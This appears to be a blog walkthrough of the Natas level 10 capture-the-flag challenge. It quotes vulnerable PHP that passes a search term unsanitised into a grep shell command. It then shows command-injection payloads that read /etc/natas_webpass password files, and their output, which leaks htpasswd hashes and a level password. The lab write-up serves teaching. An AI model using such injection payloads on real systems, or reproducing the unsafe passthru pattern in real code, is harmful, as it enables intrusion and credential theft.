Challenge:
Same as the last one but now: For security reasons, we now filter on certain characters.

Solving it:
Lets have a look at this source code

 <html>
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

If we read the code we can conclude that the characters ;, | and & are not allowed anymore and maybe / aswell. If we put these in we should get a message Input contains an illegal character!. Correct, when I input & and ; we get: Input contains an illegal character!. Good to know. But / is allowed.

Maybe we can use url encoding? So lets take the old payload: “needle dictionary.txt && cat /etc/natas_webpass/natas10 &&” and change the & to the url encodes version.

Old payload: needle dictionary.txt && cat /etc/natas_webpass/natas10 &&
New payload: needle dictionary.txt %26%26 cat /etc/natas_webpass/natas10 %26%26

Nop, this did not work. I read about control operators and i could have used # to commend out the last part. Good to know!, but I didn’t found another operator I could use. Maybe we can use grep to read the file for us and output. Lets make another list of the command, the injection point, payload and the full command to see for ourself how it works and if it would work.

command: grep -i $key dictionary.txt
Injection point: $key
Payload: .* /etc/natas_webpass/natas10 #
Full command: grep -i .* /etc/natas_webpass/natas10 # dictionary.txt

This should grep everything from the /etc/natas_webpass/natas10 file and with # the dictionary.txt part should be ignored. Lets fill in the payload and try it out.

We found the password to natas10. But wait I’m on 10. We need to change this to 11 haha.
Payload: .* /etc/natas_webpass/natas11 #

Output:

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Leave a Reply

Your email address will not be published. Required fields are marked *